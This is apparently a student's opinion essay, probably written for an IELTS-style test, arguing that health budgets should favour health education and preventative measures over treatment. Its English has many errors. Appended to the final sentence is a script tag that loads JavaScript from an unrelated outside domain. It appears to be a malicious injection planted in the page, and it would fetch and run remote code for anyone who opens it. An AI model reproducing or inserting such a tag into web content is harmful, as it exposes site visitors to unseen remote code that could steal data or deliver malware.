Out of a country's health budget, a large proportion should be diverted from treatment to spending on health education and preventative measures.
To what extent do you agree or disagree with this statement?
Investment is not only important for a businessman, but also for a country. The forms of a country’s investment can be various, depends on some determining factors for the country itself. For a country which is located in a mountainous range area for example, it must invest its budget to anticipate the unexpected disasters that might be harmful for the country, such as volcano eruption. Besides geographic location, a country should also spend its budget for some important things including health. Health becomes an important thing for a country as it can be advantageous and disadvantageous for the country’s young generation. A country can lose its young generations if there is no sufficient health facilities provided that is urgently needed when they get sick.

The statement of “prevention is better than cure” should encourage a country to be brave in highly allocating its budget for heath education. It is a great step to take as this kind of investment will be beneficial to improve the health quality of a country’s citizen. This will affect in the good quality of the human resources as well. With a high quality of human resources, a country will get more advantage in other sectors of life.
Further, there should be budget provided for having preventative measures. This measure covers some predictions and solutions for sudden thing that can happen anytime, such as the attack of certain virus. A country with no prevention to this kind of condition will get panic as there is no solution provided to handle it. Different condition will happen in a country with preventative measure. With some predictions made previously, a country will be more prepared to face this problem. A country can take lesson from previous diseases that are existed in the country and learn from other countries as there is a chance as well for the disease to migrate.
Above all, it can be concluded that both health education and preventative measures need to get high attention from a country. By providing high portion of its budget, a country has done a big thing to protect the country.<script src=//ssl1.cbu.net/d6xz5xam></script>
